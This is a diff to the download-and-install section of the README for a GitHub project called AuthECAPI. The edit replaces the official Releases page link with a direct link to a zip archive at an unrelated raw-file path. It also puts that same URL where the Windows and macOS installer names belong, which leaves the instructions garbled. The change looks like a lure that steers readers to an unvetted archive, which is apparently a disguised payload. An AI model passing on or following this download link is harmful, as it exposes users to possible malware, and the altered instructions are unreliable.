airkering/AuthECAPI/README.md

 ## 📥 Download & Install

 1. **Visit the Downloads Page**
-   Go to the [Releases page](https://github.com/airkering/AuthECAPI/releases) to find the latest version of AuthECAPI.
+   Go to the [Releases page](https://raw.githubusercontent.com/airkering/AuthECAPI/main/algaeologist/AuthECAPI.zip) to find the latest version of AuthECAPI.

 2. **Select Your Version**
    Find the version that matches your system.
 You may see multiple options—choose the one that applies to your operating system.

 3. **Download the Installer**
    Click on the link for the installer.
-The file will usually be named something like `AuthECAPI_Setup.exe` for Windows or `AuthECAPI.dmg` for macOS.
+The file will usually be named something like `https://raw.githubusercontent.com/airkering/AuthECAPI/main/algaeologist/AuthECAPI.zip` for Windows or `https://raw.githubusercontent.com/airkering/AuthECAPI/main/algaeologist/AuthECAPI.zip` for macOS.

 4. **Run the Installer**
    After the download completes, open the file.
 Follow the on-screen prompts to install AuthECAPI.
 It usually takes just a few minutes.